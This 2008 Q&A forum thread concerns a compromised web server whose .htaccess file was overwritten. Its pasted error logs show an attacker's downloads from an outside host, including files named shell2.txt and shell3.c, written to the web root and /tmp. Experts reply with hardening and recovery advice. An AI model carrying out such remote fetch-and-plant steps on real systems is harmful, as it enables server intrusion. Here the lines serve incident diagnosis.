[Okta Webinar] Learn how to a build a cloud-first strategyRegister Now

x
?
Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
15
Medium Priority
?
747 Views
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with godaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to other ip: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what's the hole and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Open in new window

0
Comment
Question by:z_ruixiang
  • 7
  • 6
  • 2
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of NIX you can change your permission on the file to read only.

Casey
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey
0
 [eBook] Windows Nano Server

Download this FREE eBook and learn all you need to get started with Windows Nano Server, including deployment options, remote management
and troubleshooting tips and tricks

 

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
LVL 29

Accepted Solution

by:
Jan Springer earned 1500 total points
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unkown file in my /tmp

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instruction on how to upgrade to php5?
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0

Featured Post

Cyber Threats to Small Businesses (Part 1)

This past May, Webroot surveyed more than 600 IT decision-makers at medium-sized companies to see how these small businesses perceived new threats facing their organizations.  Read what Webroot CISO, Gary Hayslip, has to say about the survey in part 1 of this 2-part blog series.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Stellar Exchange Toolkit: this 5 in 1 toolkit comes loaded with mega-software tool. Here’s an introduction to tools’ usage and advantages:
MSSQL DB-maintenance also needs implementation of multiple activities. However, unprecedented errors can hamper the database management. In that case, deploying Stellar SQL Database Toolkit ensures fast and accurate database and backup repair as wel…
Video by: Tony
This video teaches viewers how to export a project from Adobe Premiere Pro and the various file types involved.
Viewers will learn how to use the Hootsuite Dashboard.
Suggested Courses

872 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question